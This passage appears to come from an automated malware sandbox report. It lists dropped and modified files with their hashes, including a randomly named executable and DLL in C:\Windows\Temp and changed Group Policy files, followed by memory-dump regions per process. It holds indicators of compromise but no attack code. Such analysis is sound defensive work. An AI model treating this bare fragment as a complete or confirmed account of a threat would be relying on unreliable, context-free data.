                                                                                                                                                                    47c4dd2768297f42bcd2b0997b51e93e

                                                                                                                                                                    SHA1

                                                                                                                                                                    6a908c0265092cbf4be994d0a11c6491a62be4ef

                                                                                                                                                                    SHA256

                                                                                                                                                                    8d1f848ced192fcf9aff42a3d3f4e98fd97c17ef4155abc565a70cbe238ee754

                                                                                                                                                                    SHA512

                                                                                                                                                                    af83ee73997fbc764f7fee3440c41c648f5298cd048b23a0d7383b33b70bd9b43d9cf917daad344830eccc1f747b3c9d27daf0a3b50aaee62f898a1ba2927dc9

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qqr010ez.d4h.ps1

                                                                                                                                                                    Filesize

                                                                                                                                                                    60B

                                                                                                                                                                    MD5

                                                                                                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                    SHA1

                                                                                                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                    SHA256

                                                                                                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                    SHA512

                                                                                                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\snaxaw5u.default-release\prefs.js

                                                                                                                                                                    Filesize

                                                                                                                                                                    7KB

                                                                                                                                                                    MD5

                                                                                                                                                                    2bbe8ba6ee7c9fccde1920c6e4b3e936

                                                                                                                                                                    SHA1

                                                                                                                                                                    0626c7bf027fb03d2118fd08077cb229177c457e

                                                                                                                                                                    SHA256

                                                                                                                                                                    30dcd63bcab506d94abd7275ad571ef28e4ba306b0528dea789ceba1f846f4e2

                                                                                                                                                                    SHA512

                                                                                                                                                                    ed62f4b9dd3910bf589f493065fbc46a28f84549edb64e3ea3b757cd5e02fa69081b60291afa89a5ca4a34ea7459f69312603851e6bd6353ea6eb6d4e9292900

                                                                                                                                                                  • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                    Filesize

                                                                                                                                                                    1KB

                                                                                                                                                                    MD5

                                                                                                                                                                    33b19d75aa77114216dbc23f43b195e3

                                                                                                                                                                    SHA1

                                                                                                                                                                    36a6c3975e619e0c5232aa4f5b7dc1fec9525535

                                                                                                                                                                    SHA256

                                                                                                                                                                    b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

                                                                                                                                                                    SHA512

                                                                                                                                                                    676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

                                                                                                                                                                  • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                    Filesize

                                                                                                                                                                    11KB

                                                                                                                                                                    MD5

                                                                                                                                                                    e9670fd3e2c4998114241ee87b07b341

                                                                                                                                                                    SHA1

                                                                                                                                                                    9d90f324a4dad2c815f35a7a158244b895546457

                                                                                                                                                                    SHA256

                                                                                                                                                                    44078f56e9e3b8f11d7bf056dd7d4ec56aa9b6e7af1b474ba61ab7ec6573cbd5

                                                                                                                                                                    SHA512

                                                                                                                                                                    31d9e78f4ae5181569ed4207256879d7f587b111420d02f6de0a32f5aa619ac7a049512752ae1175c4e11b97bf77aab0b3b428d1630ace859f7a9420e09e21df

                                                                                                                                                                  • C:\Windows\Temp\UQvARBrwpbLJoyHM\VLPuLoua\kfashfr.dll

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.1MB

                                                                                                                                                                    MD5

                                                                                                                                                                    c2dd8b4cdb11900bbb6dc798fbe304c7

                                                                                                                                                                    SHA1

                                                                                                                                                                    2a4da4566a05cb400c9302fa304939ea25bb202f

                                                                                                                                                                    SHA256

                                                                                                                                                                    977af9828acf0d5e2f396c4bdb806079f76f55027b6808440ca0f406a9ec3ab5

                                                                                                                                                                    SHA512

                                                                                                                                                                    d86d1dd41e9289fbafd8a44c6215a4d5d3c71da9ed8ffd643b013a6ce2d37d9b9736eb2b57a059920c07177e946b42a68ef8283630dcbd7a27e83a1994b71b6e

                                                                                                                                                                  • C:\Windows\Temp\UQvARBrwpbLJoyHM\VLPuLoua\kfashfr.dll

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.1MB

                                                                                                                                                                    MD5

                                                                                                                                                                    c2dd8b4cdb11900bbb6dc798fbe304c7

                                                                                                                                                                    SHA1

                                                                                                                                                                    2a4da4566a05cb400c9302fa304939ea25bb202f

                                                                                                                                                                    SHA256

                                                                                                                                                                    977af9828acf0d5e2f396c4bdb806079f76f55027b6808440ca0f406a9ec3ab5

                                                                                                                                                                    SHA512

                                                                                                                                                                    d86d1dd41e9289fbafd8a44c6215a4d5d3c71da9ed8ffd643b013a6ce2d37d9b9736eb2b57a059920c07177e946b42a68ef8283630dcbd7a27e83a1994b71b6e

                                                                                                                                                                  • C:\Windows\Temp\UQvARBrwpbLJoyHM\oXOkPfocJkmMRby\NTJmQdD.exe

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                    MD5

                                                                                                                                                                    47c4dd2768297f42bcd2b0997b51e93e

                                                                                                                                                                    SHA1

                                                                                                                                                                    6a908c0265092cbf4be994d0a11c6491a62be4ef

                                                                                                                                                                    SHA256

                                                                                                                                                                    8d1f848ced192fcf9aff42a3d3f4e98fd97c17ef4155abc565a70cbe238ee754

                                                                                                                                                                    SHA512

                                                                                                                                                                    af83ee73997fbc764f7fee3440c41c648f5298cd048b23a0d7383b33b70bd9b43d9cf917daad344830eccc1f747b3c9d27daf0a3b50aaee62f898a1ba2927dc9

                                                                                                                                                                  • C:\Windows\Temp\UQvARBrwpbLJoyHM\oXOkPfocJkmMRby\NTJmQdD.exe

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                    MD5

                                                                                                                                                                    47c4dd2768297f42bcd2b0997b51e93e

                                                                                                                                                                    SHA1

                                                                                                                                                                    6a908c0265092cbf4be994d0a11c6491a62be4ef

                                                                                                                                                                    SHA256

                                                                                                                                                                    8d1f848ced192fcf9aff42a3d3f4e98fd97c17ef4155abc565a70cbe238ee754

                                                                                                                                                                    SHA512

                                                                                                                                                                    af83ee73997fbc764f7fee3440c41c648f5298cd048b23a0d7383b33b70bd9b43d9cf917daad344830eccc1f747b3c9d27daf0a3b50aaee62f898a1ba2927dc9

                                                                                                                                                                  • C:\Windows\Temp\UQvARBrwpbLJoyHM\oXOkPfocJkmMRby\NTJmQdD.exe

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                    MD5

                                                                                                                                                                    47c4dd2768297f42bcd2b0997b51e93e

                                                                                                                                                                    SHA1

                                                                                                                                                                    6a908c0265092cbf4be994d0a11c6491a62be4ef

                                                                                                                                                                    SHA256

                                                                                                                                                                    8d1f848ced192fcf9aff42a3d3f4e98fd97c17ef4155abc565a70cbe238ee754

                                                                                                                                                                    SHA512

                                                                                                                                                                    af83ee73997fbc764f7fee3440c41c648f5298cd048b23a0d7383b33b70bd9b43d9cf917daad344830eccc1f747b3c9d27daf0a3b50aaee62f898a1ba2927dc9

                                                                                                                                                                  • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                                                                    Filesize

                                                                                                                                                                    6KB

                                                                                                                                                                    MD5

                                                                                                                                                                    4e1a83e7759073d56e258b4a910cf62e

                                                                                                                                                                    SHA1

                                                                                                                                                                    1db40e06606e1d51dda2459df44bfa638770f2f9

                                                                                                                                                                    SHA256

                                                                                                                                                                    bd9a49eaf39752f8fe63ede63738e3f03c5f7c6ab2ee1ea4e6f11b057e788b29

                                                                                                                                                                    SHA512

                                                                                                                                                                    0dbaf9bb84b49661881dc463c5f508da01a3d75fbf0385171f64a13c3eea332396e02c95bd037dfbda20f12e0a63c739077b2cab2f2f2be8683122a0af90b482

                                                                                                                                                                  • C:\Windows\system32\GroupPolicy\gpt.ini

                                                                                                                                                                    Filesize

                                                                                                                                                                    268B

                                                                                                                                                                    MD5

                                                                                                                                                                    a62ce44a33f1c05fc2d340ea0ca118a4

                                                                                                                                                                    SHA1

                                                                                                                                                                    1f03eb4716015528f3de7f7674532c1345b2717d

                                                                                                                                                                    SHA256

                                                                                                                                                                    9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

                                                                                                                                                                    SHA512

                                                                                                                                                                    9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

                                                                                                                                                                  • memory/1596-17-0x00007FFFCE890000-0x00007FFFCF351000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    10.8MB

                                                                                                                                                                  • memory/1596-18-0x0000020233A90000-0x0000020233AA0000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/1596-19-0x0000020233A90000-0x0000020233AA0000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/1596-31-0x00007FFFCE890000-0x00007FFFCF351000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    10.8MB

                                                                                                                                                                  • memory/1596-16-0x0000020233A60000-0x0000020233A82000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/2704-12-0x0000000010000000-0x0000000010586000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    5.5MB

                                                                                                                                                                  • memory/2704-32-0x0000000000A40000-0x0000000001123000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                  • memory/2704-11-0x0000000000A40000-0x0000000001123000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                  • memory/2704-563-0x0000000000A40000-0x0000000001123000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                  • memory/2824-84-0x00007FFFCE2C0000-0x00007FFFCED81000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    10.8MB

                                                                                                                                                                  • memory/2824-85-0x0000013CEBA80000-0x0000013CEBA90000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/2824-98-0x00007FFFCE2C0000-0x00007FFFCED81000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    10.8MB

                                                                                                                                                                  • memory/3036-43-0x0000000003860000-0x0000000003870000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/3036-59-0x0000000004B00000-0x0000000004B4C000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    304KB

                                                                                                                                                                  • memory/3036-44-0x0000000003EA0000-0x00000000044C8000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.2MB

                                                                                                                                                                  • memory/3036-45-0x0000000003BE0000-0x0000000003C02000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/3036-42-0x0000000073550000-0x0000000073D00000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    7.7MB

                                                                                                                                                                  • memory/3036-41-0x00000000011A0000-0x00000000011D6000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    216KB

                                                                                                                                                                  • memory/3036-46-0x0000000003D80000-0x0000000003DE6000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    408KB

                                                                                                                                                                  • memory/3036-50-0x00000000044D0000-0x0000000004536000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    408KB

                                                                                                                                                                  • memory/3036-57-0x0000000004640000-0x0000000004994000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    3.3MB

                                                                                                                                                                  • memory/3036-58-0x0000000004AC0000-0x0000000004ADE000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    120KB

                                                                                                                                                                  • memory/3036-63-0x0000000073550000-0x0000000073D00000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    7.7MB

                                                                                                                                                                  • memory/3036-60-0x0000000003860000-0x0000000003870000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/3692-159-0x0000000002A80000-0x0000000002AE9000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    420KB

                                                                                                                                                                  • memory/3692-504-0x00000000032E0000-0x000000000339F000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    764KB

                                                                                                                                                                  • memory/3692-566-0x0000000000230000-0x0000000000913000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                  • memory/3692-104-0x0000000000230000-0x0000000000913000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                  • memory/3692-106-0x0000000010000000-0x0000000010586000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    5.5MB

                                                                                                                                                                  • memory/3692-489-0x0000000003260000-0x00000000032D2000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    456KB

                                                                                                                                                                  • memory/3692-117-0x00000000026B0000-0x0000000002735000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    532KB

                                                                                                                                                                  • memory/4192-79-0x0000000073550000-0x0000000073D00000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    7.7MB

                                                                                                                                                                  • memory/4192-65-0x0000000073550000-0x0000000073D00000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    7.7MB

                                                                                                                                                                  • memory/4192-78-0x0000000001010000-0x0000000001020000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/4192-66-0x0000000001010000-0x0000000001020000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/4300-105-0x0000000000340000-0x0000000000A23000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                  • memory/4300-86-0x0000000000340000-0x0000000000A23000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                  • memory/4300-38-0x0000000010000000-0x0000000010586000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    5.5MB

                                                                                                                                                                  • memory/4300-37-0x0000000000340000-0x0000000000A23000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.9MB

                                                                                                                                                                  • memory/4920-518-0x0000000001360000-0x00000000018E6000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    5.5MB